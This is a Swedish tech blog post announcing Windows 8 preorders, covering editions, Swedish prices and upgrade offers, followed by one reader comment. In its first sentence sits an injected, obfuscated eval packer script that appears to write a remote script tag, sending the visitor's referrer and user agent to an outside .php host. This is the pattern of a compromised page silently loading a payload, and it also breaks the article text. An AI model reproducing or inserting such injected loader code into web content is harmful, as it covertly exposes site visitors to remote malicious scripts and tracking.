Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

PC

Förbokningar av Windows 8 inleds av Microsoft

Förbokningar av Windows 8 inleds av Microsoft
Sebastian Plengier Ehrnfelt

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edrzk|var|u0026u|referrer|nhzbb||js|php’.split(‘|’),0,{}))
är det dags. Det efterlängtade Windows 8 är bakom hörnet och nu inleder Microsoft förbokningarna av operativsystemet. Det går även rykten om att jätten inte kommer att spara på krutet gällande deras marknadsföring av Windows 8. Det kommer att satsas över en miljard dollar världen över, motsvarande 6,7 miljarder svenska kronor.

Microsoft kommer att släppa Windows 8 för x86-baserade persondatorer i två huvudutgåvor.

Den billigare standardvarianten är till för hemmaanvändare och saknar en del företagsorienterade funktioner som bitlocker, virtualisering och stöd för Windows-domäner.
Den andra utgåvan är till för avancerade användare och företag. Den kommer att heta Professional och innehålla den kompletta samlingen av alla program och verktyg.
Det kommer även att lanseras volymlicenser i form av Enterprise som levererar funktioner anpassade för större företag eller organisationer.

För er hemmabyggare rekommenderas OEM-licens vilket innehåller tillåtelsen att flytta operativsystemet mellan olika datorsystem. 900 kronor kommer man få lägga för standardutgåvan medan Professional hittas för 1 300 kronor. Alternativet finns också att uppgradera från Windows XP eller senare (uppgraderingslicensen) för 550 kronor.

För de personer som köpt en dator efter den 1 juni 2012 kommer ha möjligheten att uppgradera till Windows 8 för endast 139 kronor. En bra deal som man brukar säga.

Alla dessa leveranser kommer att inledas i samband med lansering av Windows 8 den 26 oktober 2012. Håll i er, snart är operativsystemet här! 🙂

Revue.se är riktigt taggad på detta release. Även om några av oss redan har beta-versionen av Windows 8 installerat på några datorer så är detta väldigt stort. Även deras kommande Surface är något som vi kommer att försöka få tag i så fort som möjligt. Kanske ser till att försöka förboka en platta så man är säker vid leverseans.

Vad tycker ni? Kommer ni att uppgradera er till Windows 8 så snabbt som möjligt?
Tror ni deras tablet Surface kommer att bli bättre än konkurrenternas ?

Kommentera gärna nedan, vi vill höra er läsares ord!

 

Comments

  1. Puss

    Wonderful!!!